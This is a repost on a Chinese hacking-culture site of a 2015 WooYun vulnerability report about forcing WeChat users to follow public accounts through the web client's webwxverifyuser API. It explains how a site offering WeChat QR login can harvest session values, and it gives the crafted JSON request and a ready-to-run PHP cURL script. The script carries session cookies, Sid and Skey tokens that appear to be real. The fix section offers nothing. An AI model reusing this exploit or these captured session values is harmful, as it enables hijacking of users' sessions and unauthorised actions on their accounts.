记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

微信强制用户关注公众号

2015-12-27 04:00

微信设计错误,可导致用户强制关注公众号

漏洞内容:

第一步测试 登陆微信网页版

之后转发一个微信公众号关注链接过来

找到接口 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser

之后点击加好友没有用

发现还是有参数传递的



强制关注如下,只要发送下面参数就可以了

https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(微信用户值),"Sid":"(微信用户值)","Skey":"(微信用户值)","DeviceID":"(微信用户值)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(公众号加密值)","VerifyUserTicket":"(公众号加密值)"}],"VerifyContent":"我是(用户名)","SceneListCount":10,"SceneList":[33],"skey":"(用户值)"}

(用户值) 全部都可以通过 微信扫描登录获取到,只要你扫描登录我网站就能让这个微信号强制关注公众号



(公众号加密值)这个接口获取 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsync?sid=(微信的用户值)&skey=(微信的用户值)



最后测试发现 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(微信用户值),"Sid":"(微信用户值)","Skey":"(微信用户值)","DeviceID":"(微信用户值)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(公众号的微信号)","VerifyUserTicket":""}],"VerifyContent":"我是(用户名)","SceneListCount":10,"SceneList":[33],"skey":"(用户值)"}





强制关注条件如下 1.扫描登录我网站 2.知道要强制关注公众号的微信号







用户值获取再强调一遍,网站接入微信扫描登录即可拿到,上面的用户值,确实有这个漏洞





我经过测试一天,大概可以让一个微信号强制关注20个左右





$header = array (

'Host: wx2.qq.com',

'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0',

'Accept: application/json, text/plain, */*',

'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

'Accept-Encoding: gzip, deflate',

'DNT: 1',

'Content-Type: application/json;charset=utf-8',

'Referer: https://wx2.qq.com/',

'Cookie: wxuin=2330616138; webwxuvid=cab5317930f5335a8994ade9a8160d9a0c1e843e1bd24ff03ab254c91d4ea3a8ec31a98c8d9adb6087cf6e9043d53c58; pgv_pvi=3286183936; pgv_pvid=8255006950; pgv_info=ssid=s2371423939; pgv_si=s1581726720; wxsid=hBgpWPQeDRDVm3Rc; wxloadtime=1444359620_expired; mm_lang=zh_CN; webwx_data_ticket=AQaRtHUZKZBvZZR2FeXCn5pg; MM_WX_NOTIFY_STATE=1; MM_WX_SOUND_STATE=1; wxpluginkey=1444352949',

'Connection: keep-alive',

);



$data='{"BaseRequest":{"Uin":2330616138,"Sid":"hBgpWPQeDRDVm3Rc","Skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4","DeviceID":"e589828811516427"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"gopartygo","VerifyUserTicket":""}],"VerifyContent":"我是123456789","SceneListCount":1,"SceneList":[33],"skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4"}';



$ch = curl_init("http://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444361009023");

curl_setopt($ch, CURLOPT_HTTPHEADER, $header);





curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt ( $ch, CURLOPT_POST, 1 );

curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data );

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);



$b=curl_exec($ch);



curl_close($ch);







上面的是php代码,里面的用户值,你扫描登录微信网页版,你手动抓上去,运行就可以了



这个补充够充分了吧!!!代码都发你了,图片我截图不了给你,视频倒是可以,我懒得拍











漏洞证明:

https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300

{"BaseRequest":{"Uin":2330616138,"Sid":"Ix4w3k0gAVg1T5SW","Skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296","DeviceID":"e426131629909286"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"@888d1b21d2fe80dafe922ed50723874b","VerifyUserTicket":"v1_92c7ceebbd2a799f06c7e5f97fd352c5c040d63b8c40ec055b6968f5068860d3@stranger"}],"VerifyContent":"我是123456789","SceneListCount":10,"SceneList":[33],"skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296"}

修复方案:

微信有大神不瞎说了

知识来源: www.wooyun.org/bugs/wooyun-2015-0150266

阅读:886064 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“微信强制用户关注公众号”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云